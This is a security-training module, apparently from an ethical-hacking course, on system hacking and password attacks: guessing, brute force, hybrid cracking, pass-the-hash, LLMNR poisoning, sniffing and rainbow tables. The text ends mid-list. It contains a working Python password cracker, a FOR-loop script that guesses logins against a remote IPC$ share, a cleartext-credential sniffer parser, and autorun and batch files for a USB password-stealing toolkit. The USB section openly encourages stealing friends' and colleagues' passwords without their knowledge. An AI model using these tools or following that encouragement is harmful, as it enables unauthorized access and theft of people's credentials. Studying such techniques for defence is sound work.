Module Objectives

 

System hacking is one of the most important and, sometimes, the ultimate goal of an attacker. The attacker acquires information through techniques such as footprinting, scanning, and enumeration, and uses it to hack the target system. This module will focus your awareness on the tools and techniques used by the attacker to achieve his/her goal of hacking the target system.

 

This module starts with an overview of hacking methodology. Later, it discusses in detail various hacking stages, such as gaining and maintaining access, and clearing logs. The module ends with a discussion on system hacking penetration testing.

 

At the end of this module, you will be able to:

■ Describe the CEH Hacking Methodology

■ Explain different techniques to gain access to the system

■ Apply privilege escalation techniques

■ Explain different techniques to create and maintain remote access to the system

■ Describe different types of rootkits

■ Explain steganography and steganalysis techniques

■ Apply different techniques to hide the evidence of compromise

■ Perform system hacking penetration testing

 


System Hacking Concepts

An attacker engages in system hacking attempts using information collected in the earlier footprinting, scanning, enumeration, and vulnerability analysis phases. Let us go over these phases and the information collected thus far. Prior to this module, we discussed:

 

■ Footprinting Module: Footprinting is the process of accumulating data regarding a specific network environment. In the footprinting phase, the attacker creates a profile of the target organization, obtaining information such as its IP address range, namespace, and employees.

 

Footprinting eases the process of system hacking by revealing the target's weak points. For example, the organization's website may provide employee bios or a personnel directory, which the attacker can use for social engineering. A Whois query on the web can provide information about the networks and domain names associated with a specific organization.

 


■ Scanning Module: Scanning is a procedure for identifying active hosts, open ports, and unnecessary services enabled on particular hosts. Attackers use different types of scanning, such as port scanning, network scanning, and vulnerability scanning of target networks or systems, which help in identifying possible vulnerabilities. Scanning procedures such as port scanning and ping sweeps return information about the services offered by the live hosts that are active on the Internet, and their IP addresses.

 

■ Enumeration Module: Enumeration is a method of intrusive probing, through which attackers gather information such as network user lists, routing tables, security flaws, and Simple Network Management Protocol (SNMP) data. This is significant, because the attacker ranges over the target territory to glean information about the network and its shares, users, groups, applications, and banners.

 

Enumeration involves making active connections to the target system or subjecting it to direct queries. Normally, an alert and secure system will log such attempts. Often, the information gathered is publicly available anyway, such as a DNS address; however, the attacker might also stumble upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session, allowing shares and accounts to be enumerated.

■ Vulnerability Analysis Module: Vulnerability assessment is an examination of the ability of a system or application, including its current security procedures and controls, to withstand assault. It recognizes, measures, and classifies security vulnerabilities in a computer system, network, and communication channels. Attackers perform vulnerability analysis to identify security loopholes in the target organization's network, communication infrastructure, and end systems, and then use the identified vulnerabilities to exploit the target network further.

CEH Hacking Methodology (CHM)

In preparation for hacking a system, attackers follow a certain methodology. They first obtain information during the footprinting, scanning, and enumeration phases, which they then use to exploit the target system. There are three steps in the CEH Hacking Methodology (CHM):

 

Gaining Access

Involves gaining access to low-privileged user accounts by cracking passwords through techniques such as brute-forcing, password guessing, and social engineering, and then escalating those privileges to administrative levels in order to perform protected operations.

 

Maintaining Access

After successfully gaining access to the target system, attackers work to maintain high levels of access to perform malicious activities such as executing malicious applications and stealing, hiding, or tampering with sensitive system files.

 

Clearing Logs

To maintain future system access, attackers attempt to avoid recognition by legitimate system users. To remain undetected, attackers wipe out the entries corresponding to their activities in the system log, thus avoiding detection by users.

 

Hacking Goals

Hacking Stage          | Goal                                                             | Technique/Exploit Used
-----------------------|------------------------------------------------------------------|----------------------------------------
Gaining Access         | To gain access to the target system                              | Password cracking, social engineering
Escalating Privileges  | To obtain administrator privileges from a low-privileged account | Exploiting known system vulnerabilities
Executing Applications | To create and maintain remote access to the system               | Trojans, spyware, backdoors, keyloggers
Hiding Files           | To hide attackers' malicious activities                          | Rootkits, steganography
Covering Tracks        | To hide the evidence of compromise                               | Clearing logs

 

 

 

System Hacking Goals

The intent of every criminal is to achieve a certain goal. Likewise, attackers can have certain goals behind their system attacks. The following are some goals of system attackers. The diagram in the slide shows these goals at different hacking stages and the techniques used to achieve them.

 

■ Gaining Access

In system hacking, the attacker first tries to gain access to a target system using information obtained and loopholes found in the system’s access control mechanism. Once attackers succeed in gaining access to the system, they are free to perform malicious activities such as stealing sensitive data, implementing a sniffer to capture network traffic, and infecting the system with malware. At this stage, attackers use techniques such as password cracking and social engineering tactics to gain access to the target system.

 

■ Escalating Privileges

After gaining access to a system using a low-privileged normal user account, attackers may then try to increase their administrator privileges to perform protected system operations, so that they can proceed to the next level of the system hacking phase: to execute applications. Attackers exploit known system vulnerabilities to escalate user privileges.

 

■ Executing Applications

Once attackers have administrator privileges, they attempt to install malicious programs such as Trojans, backdoors, rootkits, and keyloggers, which grant them remote system access and let them execute malicious code remotely. Installing rootkits gives them access at the operating-system level to perform malicious activities.

To maintain access for use at a later date, they may install backdoors.

 

■ Hiding Files

Attackers use Rootkits and steganography techniques to attempt to hide the malicious files they install on the system, and thus their activities.

 

■ Covering Tracks

To remain undetected, it is important for attackers to erase all evidence of security compromise from the system. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.

 

Cracking Passwords

As discussed earlier, CHM involves various steps attackers follow to hack systems. The following section discusses these steps in greater detail. The first step, password cracking, covers the tools and techniques attackers use to crack passwords on the target system.

 

Password Cracking

Password cracking is the process of recovering passwords from the data transmitted by a computer system or stored in it. The purpose of password cracking might be to help a user recover a forgotten or lost password, as a preventive measure by system administrators to check for easily breakable passwords, or an attacker can use this process to gain unauthorized system access.

 

Hacking often begins with password cracking attempts. A password is a key piece of information necessary to access a system. Consequently, most attackers use password cracking techniques to gain unauthorized access. An attacker may either crack a password manually by guessing it, or use automated tools and techniques such as a dictionary or a brute-force method. Most password cracking techniques are successful because of weak or easily guessable passwords.


Types of Password Attacks

Password cracking is one of the crucial stages of system hacking. The same techniques also serve legitimate purposes, such as recovering a user's forgotten password, but attackers use them to gain unauthorized system access. Password attacks are classified by what the attacker has to do, and are typically one of four types:

■ Non-Electronic Attacks: This is probably the attacker's first attempt at obtaining target system passwords. Non-electronic or non-technical attacks do not require any technical knowledge about hacking or system exploitation; the attacker never interacts with the system electronically at all. Techniques used to perform non-electronic attacks include shoulder surfing, social engineering, dumpster diving, etc.

■ Active Online Attacks: Here the attacker must communicate with the target machine, typically by attempting to authenticate to it, so every attempt can be logged and counts toward any account-lockout threshold. Against weak passwords this is still one of the easiest routes to unauthorized, even administrator-level, access. Techniques used to perform active online attacks include password guessing, dictionary and brute-force attacks, hash injection, phishing, LLMNR/NBT-NS poisoning, Trojans/spyware/keyloggers, etc.

■ Passive Online Attacks: A passive attack is a system attack that does not result in a change to the system in any way. In this attack, the attacker does not need to communicate with the system. Instead, he/she passively monitors or records the data passing over the communication channel to and from the system. The attacker then uses the observed data to break into the system. Techniques used to perform passive online attacks include wire sniffing, man-in-the-middle attack, replay attack, etc.

■ Offline Attacks: In an offline attack the attacker has already obtained a dump of password hashes and tries to recover the clear-text passwords from it without contacting the target again, so nothing is logged on the target. Offline attacks can be time consuming, but they succeed because the passwords people choose come from a far smaller space than the hash function's output: the attacker hashes candidate passwords and compares the results to the dump. Attackers also use pre-computed hashes from rainbow tables, or spread the work across many machines in a distributed network attack.


Non-Electronic Attacks

Non-electronic, or non-technical, attacks do not require technical knowledge of methods of system intrusion. There are four types of non-electronic attacks: social engineering, shoulder surfing, keyboard sniffing, and dumpster diving.

■    Dumpster Diving

"Dumpster diving" is a key attack method that targets a substantial failure in computer security. The sensitive information that people crave, protect, and devotedly secure can be accessed by almost anyone willing to scrutinize garbage. Looking through the trash is a type of low-tech attack with many implications.

Dumpster diving was actually quite popular in the 1980s. The term itself refers to the collection of any useful, general information from waste dumps such as trashcans, curbside containers, and dumpsters. Even today, curious and/or malicious attackers sometimes find discarded media with password files, manuals, reports, receipts, credit card numbers, or other sensitive documents.

Examination of discarded material can help attackers, and there is ample evidence to support this. Support staff often dump sensitive information without a thought as to whose hands it may end up in. Attackers thus gain unauthorized system access using these methods. Likewise, the objects found can lead to other types of attacks, such as social engineering.

■   Shoulder Surfing

Shoulder surfing is a technique through which attackers steal passwords by hovering near legitimate users and watching them enter their passwords. Attackers simply watch users' keyboards or screens as they log in, and see whether users refer to, for example, an object on their desks for written passwords or mnemonics. Obviously, shoulder surfing is possible only in some proximity to the target.

This type of attack can also occur in a grocery store checkout line, when a potential victim is swiping a debit card and entering the required PIN (Personal Identification Number), which is typically only four digits, making it easier to observe.

■ Social Engineering

In computer security, social engineering is the term applied to a non-technical type of intrusion that exploits human behavior. Typically, it relies heavily on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a "con game" to break security procedures. For example, an attacker using social engineering to break into a computer network would try to gain the trust of someone authorized to access the network, and then try to extract the information that compromises network security. Social engineering is, in effect, a run-through used to procure confidential information by deceiving or swaying people. An attacker can misrepresent himself/herself as a user or system administrator to obtain a user's password. It is natural for people to be helpful and trusting. People generally make an effort to build amicable relationships with friends and colleagues. Social engineers take advantage of this tendency.

Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are not aware of the value of the information they possess and few are careful about protecting it. Attackers take advantage of this fact. Social engineers will typically search dumpsters for valuable information. A social engineer would have a tougher time getting the combination to a safe, or to a health-club locker, than a password. The best defense is to educate, train, and create awareness.


Active Online Attack: Dictionary, Brute Forcing, and Rule-based Attack

■ Dictionary Attack

In a dictionary attack, a dictionary file is loaded into the cracking application, which runs it against user accounts. The dictionary is a text file containing words commonly used as passwords, and the program tries every word in it. Beyond a standard dictionary, attackers' wordlists include entries with numbers and symbols added to words (e.g., "3December!962"). Simple keyboard finger rolls ("qwer0987"), which many believe produce random and secure passwords, are also in an attacker's dictionary. A dictionary attack is far faster than brute force because it tries only likely candidates, but it fails against passwords that are not in the list, such as random strings or multi-word passphrases.

This attack is applicable under two situations:

o  In  cryptanalysis,  to  discover  the  decryption  key  for  obtaining  the  plaintext  from ciphertext

o In computer security, to bypass authentication and access control mechanism of the computer by guessing passwords

Methods to improve the success of a dictionary attack:

o Use of a number of different dictionaries, such as technical and foreign-language dictionaries, which increases the number of possibilities

o Use of string manipulation with the dictionary (e.g., if the dictionary contains the word "system," string manipulation creates anagrams like "metsys," among others)


    Brute-Force Attack

In a brute-force attack, attackers try every combination of characters until the password is broken. Cryptographic algorithms must be sufficiently hardened to resist a brute-force attack, which RSA defines as follows: "Exhaustive key-search, or brute-force search, is the basic technique for trying every possible key in turn until the correct key is identified."

A brute-force attack on a cipher means generating every possible key and testing it against the data until the correct one is found. Even today, only attackers with sufficient processing power can complete such a search against a properly sized keyspace; against a short password, however, it is routine.

Exhaustive search of the keyspace is the baseline against which any cipher is measured. Any method that recovers the key or plaintext faster than brute force counts as a break of the cipher, and a cipher is regarded as secure if no method exists to break it other than brute force. Most ciphers lack a mathematical proof of security. If keys are chosen at random, an exhaustive search will on average find the right key after trying half of all possible keys.

Some of the considerations for brute-force attacks are:

o It is a time-consuming process.

o All passwords will eventually be found, given enough time.

■ Rule-based Attack

Attackers use this type of attack when they have obtained some information about the password. It is more powerful than the dictionary and brute-force attacks because the cracker knows the form of the password. For example, if the attacker knows that the password contains a two- or three-digit number, he or she will use that rule to narrow the search and extract the password quickly.

By obtaining useful information such as the method in which numbers and/or special characters have been used, and password length, attackers can minimize the time required to crack the password and thereby enhance the cracking tool. This technique involves brute force, a dictionary, and syllable attacks.

For online password cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the category of Hybrid and Syllable password cracking attacks.

o Hybrid Attack

This type of attack builds on the dictionary attack. Often, people change their passwords merely by adding some numbers to their old passwords. The program therefore appends numbers and symbols to the words from the dictionary to try to crack the password. For example, if the old password is "system," there is a chance that the person will change it to "system1" or "system2."

o Syllable Attack

Hackers use this cracking technique when passwords are not known words. Attackers use the dictionary and other methods to crack them, as well as all possible combinations of them.
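The four candidate-generation strategies described above, as one added example that is not part of this module: a small Python cracker that runs a dictionary pass, a rule-based pass, a hybrid pass, and finally an exhaustive search, in order of cost, against a set of unsalted SHA-256 hashes. The wordlist, the mangling rules, and the target hashes are constructed for the demonstration. The same generators would feed an online guessing loop; they are run against hashes here so the example is self-contained and runs offline.

```python
import hashlib
import itertools
import string

# Constructed wordlist: the kind of entries an attacker's dictionary holds.
WORDLIST = ["password", "system", "summer", "welcome", "qwer0987", "admin"]


def sha256_hex(candidate: str) -> str:
    """Unsalted SHA-256, standing in for whatever the target stores."""
    return hashlib.sha256(candidate.encode()).hexdigest()


def dictionary_candidates(words):
    """Plain dictionary attack: every word exactly as listed."""
    yield from words


def rule_candidates(words):
    """Rule-based attack: mangle each word the way an attacker does when the
    password 'type' is known (case change, reversal, leet substitution)."""
    leet = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
    for w in words:
        yield w.capitalize()
        yield w.upper()
        yield w[::-1]                           # "system" -> "metsys"
        yield w.translate(leet)                 # "password" -> "p@$$w0rd"
        yield w.capitalize().translate(leet)    # "password" -> "P@$$w0rd"


def hybrid_candidates(words, max_digits=2, symbols="!@#$"):
    """Hybrid attack: dictionary word plus appended digits and optionally a
    symbol ("system" -> "system1", "system12", "system1!")."""
    for w in words:
        for n in range(1, max_digits + 1):
            for digits in itertools.product(string.digits, repeat=n):
                suffix = "".join(digits)
                yield w + suffix
                for s in symbols:
                    yield w + suffix + s


def brute_force_candidates(charset, max_len):
    """Exhaustive search: every string over charset up to max_len. It always
    succeeds eventually, but the work grows as len(charset) ** length."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def crack(target_hashes, words=WORDLIST, brute_charset=string.ascii_lowercase, brute_len=4):
    """Run the cheap attacks first and the exhaustive one last. Returns
    ({hash: (plaintext, attack_that_found_it)}, number_of_guesses)."""
    remaining = set(target_hashes)
    found = {}
    guesses = 0
    stages = [
        ("dictionary", dictionary_candidates(words)),
        ("rule-based", rule_candidates(words)),
        ("hybrid", hybrid_candidates(words)),
        ("brute-force", brute_force_candidates(brute_charset, brute_len)),
    ]
    for name, candidates in stages:
        for candidate in candidates:
            if not remaining:
                return found, guesses
            guesses += 1
            digest = sha256_hex(candidate)
            if digest in remaining:
                found[digest] = (candidate, name)
                remaining.discard(digest)
    return found, guesses


if __name__ == "__main__":
    # Constructed "stolen" hashes; the last one is a strong password no stage reaches.
    targets = [sha256_hex(p) for p in ["password", "metsys", "system1!", "zzq", "T7#kLp9!"]]
    found, guesses = crack(targets)
    for digest, (plaintext, attack) in found.items():
        print(f"{digest[:12]}...  {plaintext:10s}  via {attack}")
    print(f"{len(found)} of {len(targets)} recovered after {guesses} guesses")
```

The stage order is the practical one: each dictionary-derived pass costs a few thousand hashes, while the four-character lowercase brute-force pass alone costs about 475,000, and the strong password is never recovered by any of them.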


Active Online Attack: Password Guessing

Password guessing is one of the password cracking techniques that involves attempting to log on to the target system with different passwords manually. Guessing is the key element of manual password cracking. The attacker creates a list of all possible passwords from the information collected through social engineering or any other way and tries them manually on the victim's machine to crack the passwords.

The following are the steps involved in password guessing:

■    Find a valid user

■   Create a list of possible passwords

■    Rank passwords from high probability to low

■    Key in each password, until correct password is discovered

Hackers can crack the passwords manually or by using automated tools, methods, and algorithms. They can also automate password cracking using a simple FOR loop. A hacker can also create a script file that tries each password in a list. Still, these techniques are considered manual cracking. The failure rate of this type of attack is high.

Manual Password-Cracking Algorithm

In its simplest form, this algorithm can automate password guessing using a simple FOR loop. In the example that follows, an attacker creates a simple text file with user names and passwords and iterates them using the FOR loop.


The main FOR loop can extract the user names and passwords from the text file, which serves as a dictionary as it iterates through every line:

[file: credentials.txt]

administrator ""

administrator password

administrator administrator

[Etc.]

Type the following commands to access the text file from a directory:

c:\>FOR /F "tokens=1,2*" %i in (credentials.txt) ^
More? do net use \\victim.com\IPC$ %j /u:victim.com\%i ^
More? 2>>nul ^
More? && echo %time% %date% >> outfile.txt ^
More? && echo \\victim.com acct: %i pass: %j >> outfile.txt

c:\>type outfile.txt

The outfile.txt contains each user name and password from credentials.txt for which the net use command succeeded, and the attacker can then open a session with the victim server from his/her own system. Every failed attempt is recorded on the target as a failed logon (Windows event ID 4625) and counts toward any account-lockout threshold, which is why attackers rank their candidate list and keep it short.


Default Passwords

Default passwords are those supplied by manufacturers with new equipment (e.g., switches, hubs, routers). Usually, the default password lets the user access the device during initial setup, after which it is supposed to be changed. Often, however, an administrator either forgets to set a new password or ignores the recommendation and continues using the original one. Attackers exploit this lapse by looking up the default password for the target device on the manufacturer's website or in online default-password databases, and then logging in with it. Attackers also add default passwords to the wordlists they use for password guessing attacks.

The following are some of the online tools to search default passwords:

■   http://open-sez.me

■   https://www.fortypoundhead.com

■   https://cirt.net

■   http://www.defaultpassword.us

■   http://defaultpasswords.in

■   http://www.routerpasswords.com

■   http://www.defaultpassword.com

■   https://default-password.info



Active Online Attack: Trojan/Spyware/Keylogger

A Trojan is a program that masks itself as a benign application. The software initially appears to perform a desirable or benign function but instead steals information or harms the system. With a Trojan, attackers can gain remote access and perform various operations limited by user privileges on the target computer.

Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect.

A keylogger is a program that records all user keystrokes without the user's knowledge. Keyloggers ship the log of keystrokes to an attacker-controlled machine or hide it on the victim's machine for later retrieval. The attacker then scrutinizes the log to find passwords or other useful information that could compromise the system.

An attacker installs a Trojan, spyware, or keylogger on a victim's machine to collect the victim's user names and passwords. These programs run in the background and send all captured credentials back to the attacker.

For example, a keylogger on a victim's computer is capable of revealing the contents of all of the user's e-mails. The picture given in the slide depicts a scenario describing how an attacker gains password access using a Trojan/spyware/keylogger.


Example of Active Online Attack Using USB Drive

Obtaining passwords using a USB drive is a physical approach to password hacking. People who have many online accounts often let the browser, messenger client, or other application store their user names and passwords so they do not have to remember them. An attacker with brief physical access can recover those stored credentials by plugging in a USB drive that carries portable password-recovery tools and a script that launches them.

The trick depends on Windows AutoRun processing the autorun.inf on the drive, which is how it worked on Windows 2000, XP, and Vista. Microsoft disabled AutoRun for non-optical removable drives by default from Windows 7 onward and back-ported that change to XP and Vista through an update in 2011, so on patched systems the autorun.inf is ignored and the batch file has to be launched by hand.

All the applications involved are portable and small enough to copy to the USB drive in seconds, and the same approach recovers stored messenger passwords. Using these tools and a USB pen drive, you can assemble a toolkit to recover passwords from the target computer.

Following are the steps to steal passwords using a USB device:

1.   Download PassView, a password-recovery tool (pspv.exe).

2.   Copy the downloaded pspv.exe to the USB drive.

3.   Create a Notepad document with the following content:

[autorun]
open=launch.bat

After writing this content into Notepad, save the document as autorun.inf and copy it to the USB drive.

4.   Open Notepad and write the following content (the /stext switch makes the tool write its results to the named text file):

start pspv.exe /stext pspv.txt

After that, save the file as launch.bat and copy it to the USB drive.

5.   Insert the USB drive and the autorun window pop-up appears (if enabled).

6.   PassView (or other password-hacking tool) runs in the background and stores the passwords in the .txt files on the USB drive.

In this way, you can create your own USB password recovery toolkit and use it to steal the stored passwords of your friends or colleagues without their knowledge. It only takes a few seconds to retrieve passwords.


Active Online Attack: Hash Injection Attack

This type of attack is possible when the target system authenticates its users by proving knowledge of a password hash rather than of the password itself. Windows stores the NT hash of each local account in the SAM database, and NTLM authentication never transmits the password: the client derives its response from the hash and a challenge from the server, so whoever holds the hash can authenticate exactly as the user can.

Attackers take advantage of this by first compromising a host and extracting the hashes from its SAM database or from memory. They then inject a stolen hash into a local logon session and use it to authenticate to network resources as that user, without ever cracking the hash; this is why the attack is also called pass-the-hash. Note that it works with NT hashes, not with the NetNTLMv2 responses captured by LLMNR/NBT-NS poisoning, which are tied to a particular challenge and must be cracked or relayed instead.

The hacker carries out this attack in the following four steps:

■   The hacker compromises one workstation/server using a local or remote exploit.

■   The hacker extracts the stored hashes and finds a domain admin account hash.

■   The hacker uses that hash to log on to any system, including a domain controller, as that account.

■   The hacker extracts all the hashes from the Active Directory database and can now compromise any account in the domain.



Active Online Attack: LLMNR/NBT-NS Poisoning

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two name-resolution protocols in Windows that resolve host names on the local link when DNS cannot. Both are enabled by default in Windows operating systems.

When DNS fails to resolve a name, the host falls back to an unauthenticated multicast (LLMNR, UDP port 5355) or broadcast (NBT-NS, UDP port 137) query asking every host on the link whether it owns that name. Because the query is unauthenticated and any host may answer it, an attacker listening passively on the segment can reply first, claiming to be the requested host. The victim then connects to the attacker's machine, where a tool such as Responder or Metasploit runs a rogue server for the requested service (for example an SMB server on TCP port 445) that demands NTLM authentication.

During that authentication the victim sends its NTLMv2 response (often called the NetNTLMv2 hash), computed from the victim's password hash and the rogue server's challenge. The attacker stores it on disk and cracks it offline with tools such as hashcat or John the Ripper; once cracked, the credentials can be used to log in to the legitimate systems. A captured NetNTLMv2 response cannot simply be replayed, because it is bound to the server's challenge, but where SMB signing is not enforced it can be relayed to another host in real time instead of cracked. Defenders remove the attack surface by disabling LLMNR through Group Policy and NetBIOS over TCP/IP on each adapter, and by requiring SMB signing.


Steps involved in LLMNR/NBT-NS poisoning:

1.   A user tries to connect to the file-sharing host \\DataServer but mistypes the name as \\DtaServr.

2.   The DNS server responds that it does not know a host named \\DtaServr.

3.   The user's machine then sends an LLMNR/NBT-NS query asking whether anyone on the network knows the host \\DtaServr.

4.   The attacker replies claiming to be that host, accepts the user's NTLMv2 response, and returns an error to the user so that nothing looks amiss.

LLMNR/NBT-NS Poisoning Tools

■ Responder

Source: https://github.com

Responder is an LLMNR, NBT-NS, and mDNS poisoner. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only responds to File Server Service requests, which are for SMB.

Features:

o Built-in SMB, MSSQL, HTTP, HTTPS, and LDAP authentication servers

o Built-in FTP, POP3, IMAP, and SMTP authentication servers

o ICMP redirect

o Rogue DHCP

Some other LLMNR/NBT-NS spoofing tools are listed below:

■    Metasploit (https://www.metasploit.com)

■    NBNSpoof (https://github.com)

■    Inveigh (https://github.com)


Passive Online Attack: Wire Sniffing

Packet sniffing is a form of wire sniffing or wiretapping in which attackers capture packets in transit and read credentials out of them. With packet sniffing, an attacker can obtain passwords for e-mail, websites, SMB, FTP, rlogin sessions, or SQL whenever the protocol carries them in clear text. Because sniffers run silently in the background, the victim is not aware of the sniffing.

Sniffers capture frames at the data link layer, so they can grab every packet that reaches the network interface of the machine running them. On a hub-based LAN this is easy: a hub is a broadcast medium shared by every system, so the LAN delivers every frame to every machine, and a sniffer on any one system sees data sent to and from all the others. Most sniffer tools are built for exactly this situation. They are passive sniffers, waiting for traffic to pass rather than generating any, which makes them efficient at gathering data imperceptibly. On a switched LAN the switch forwards unicast frames only to the destination port, so a passive sniffer sees only its own traffic plus broadcasts, and an attacker then needs ARP poisoning, a port mirror, or another active technique to see other hosts' traffic. The captured data may include passwords sent to remote systems during FTP and rlogin sessions and in electronic mail, which the attacker uses to gain unauthorized access to the target system. A variety of tools for passive wire sniffing are available on the Internet.
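What a passive sniffer does with the frames it captures, as an added example that is not part of this module: a Python parser for Ethernet/IPv4/TCP that pulls USER/PASS pairs out of FTP and POP3 sessions and decodes HTTP Basic credentials. The frames, addresses, and credentials are constructed inline so that it runs without a network interface; in practice the frames would come from a pcap file or a raw socket.

```python
import base64
import re
import struct


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed test frame: Ethernet II + minimal IPv4 + TCP header, no checksums."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00"
    total = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame: bytes):
    """Return (src, dst, sport, dport, payload), or None if the frame is not IPv4/TCP."""
    if len(frame) < 14 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                   # protocol 6 is TCP
        return None
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_off:]


CLEARTEXT_LOGIN_PORTS = {21: "ftp", 110: "pop3"}
USER_RE = re.compile(rb"^USER (\S+)", re.I | re.M)
PASS_RE = re.compile(rb"^PASS (\S+)", re.I | re.M)
BASIC_RE = re.compile(rb"^Authorization: Basic ([A-Za-z0-9+/=]+)", re.I | re.M)


def extract_credentials(frames):
    """Pair USER with the following PASS per (client, server, port) stream;
    HTTP Basic carries both in one header."""
    pending_user = {}
    creds = []
    for frame in frames:
        parsed = parse_frame(frame)
        if not parsed:
            continue
        src, dst, sport, dport, payload = parsed
        stream = (src, dst, dport)
        if dport in CLEARTEXT_LOGIN_PORTS:
            m = USER_RE.search(payload)
            if m:
                pending_user[stream] = m.group(1).decode(errors="replace")
            m = PASS_RE.search(payload)
            if m and stream in pending_user:
                creds.append((CLEARTEXT_LOGIN_PORTS[dport], dst,
                              pending_user.pop(stream), m.group(1).decode(errors="replace")))
        elif dport == 80:
            m = BASIC_RE.search(payload)
            if m:
                user, _, pw = base64.b64decode(m.group(1)).decode(errors="replace").partition(":")
                creds.append(("http-basic", dst, user, pw))
    return creds


# Constructed capture: an FTP login split over two segments, a POP3 login in one,
# an HTTP request with Basic auth, and a TLS record on 443 that yields nothing.
CAPTURE = [
    build_frame("10.0.0.5", "10.0.0.20", 40001, 21, b"USER bob\r\n"),
    build_frame("10.0.0.5", "10.0.0.20", 40001, 21, b"PASS s3cret\r\n"),
    build_frame("10.0.0.7", "10.0.0.21", 40002, 110, b"USER carol\r\nPASS hunter2\r\n"),
    build_frame("10.0.0.9", "10.0.0.22", 40003, 80,
                b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
                + base64.b64encode(b"dave:Pa55w0rd") + b"\r\n\r\n"),
    build_frame("10.0.0.9", "10.0.0.23", 40004, 443, b"\x16\x03\x01\x00\x2a"),
]

if __name__ == "__main__":
    for proto, host, user, pw in extract_credentials(CAPTURE):
        print(f"{proto:10s} {host:12s} {user}:{pw}")
```

The TLS frame on port 443 is there to make the point the text implies: a sniffer only yields credentials from protocols that send them in the clear, which is why the defensive answer is encrypting the session rather than trusting the LAN.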


Passive Online Attacks: Man-in-the-Middle and Replay Attack

When two parties are communicating, a man-in-middle attack can take place, in which a third party intercepts a communication between the two parties without their knowledge. Meanwhile, the third party eavesdrops on the traffic, and then passes it along. To do so, the "man in the middle" has to sniff from both sides of the connection simultaneously. In a MITM attack, the attacker acquires access to the communication channels between victim and server to extract the information. This type of attack is often used in telnet and wireless technologies. It is not easy to implement such attacks because of the TCP sequence numbers and the speed of the communication. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.

In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant information is extracted, the tokens are placed back on the network to gain access. The attacker uses this type of attack to replay bank transactions or other similar types of data transfer, in the hope of replicating and/or altering activities such as banking deposits or transfers.


Offline Attack: Rainbow Table Attack

Offline attacks occur when the intruder checks the validity of passwords after observing how they are stored. If the user names and passwords are stored in a readable file, it is easy for the attacker to gain access to the system. Hence, it is important to protect the password list and keep it in an unreadable form, preferably encrypted.

Offline attacks are time-consuming; however, they can succeed when the keyspace is small and the passwords are short. Different password cracking techniques are available on the Internet.

Two examples of offline attacks are:

1.   Rainbow Table Attack

2.   Distributed Network Attack

Rainbow Table Attack

A rainbow table attack uses the cryptanalytic time-memory trade-off technique, which requires less time than some other techniques. It uses already-calculated information stored in memory to crack the hashes. In the rainbow table attack, the attacker creates a table of all the possible passwords and their respective hash values, known as a rainbow table, in advance.

Rainbow Table: A rainbow table is a precomputed table which contains word lists like dictionary files and brute force lists and their hash values. It is a lookup table specially used in recovering a plaintext password from a cipher text. The attacker uses this table to look for the password and tries to recover it from password hashes.

Computed Hashes: An attacker computes the hash for a list of possible passwords and compares it to the pre-computed hash table (rainbow table). If attackers find a match, they can crack the password.

Compare the Hashes: An attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, then the password is cracked. It is easy to recover passwords by comparing captured password hashes to the pre-computed tables.


Tools to Create Rainbow Tables: rtgen and Winrtgen

Attackers can create rainbow tables by using the following tools.

■    rtgen

Source: http://project-rainbowcrack.com

RainbowCrack is a general-purpose implementation that takes advantage of the time-memory trade-off technique to crack hashes. This project allows you to crack a hashed password. The rtgen tool of this project generates the rainbow tables. The rtgen program needs several parameters to generate a rainbow table.

The syntax of the command line is:

Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

■   Winrtgen

Source: http://www.oxid.it

Winrtgen is a graphical rainbow tables generator that helps attackers to create rainbow tables from which they can crack the hashed password. Winrtgen supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.

Generate rainbow tables using Winrtgen:

1.   Download and install Winrtgen. Click the Add Table button.

2.   In the Rainbow Table properties window, set up all of the properties, and click OK. In the main program, click OK.


Offline Attack: Distributed Network Attack

A Distributed Network Attack (DNA) is a technique used for recovering password-protected files that utilizes the unused processing power of machines across the network to decrypt passwords. In this attack, an attacker installs a DNA manager in a central location where machines running DNA clients can access it over a network. The DNA manager coordinates the attack, assigning small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password.

Features of the DNA:

■    Reads statistics and graphs easily

■   Adds user dictionaries to crack the password

■    Optimizes password attacks for specific languages

■    Modifies the user dictionaries

■    Comprises the stealth client installation functionality

■   Automatically updates clients while updating the DNA server

On classification, the DNA splits into two modules:

■    DNA Server Interface

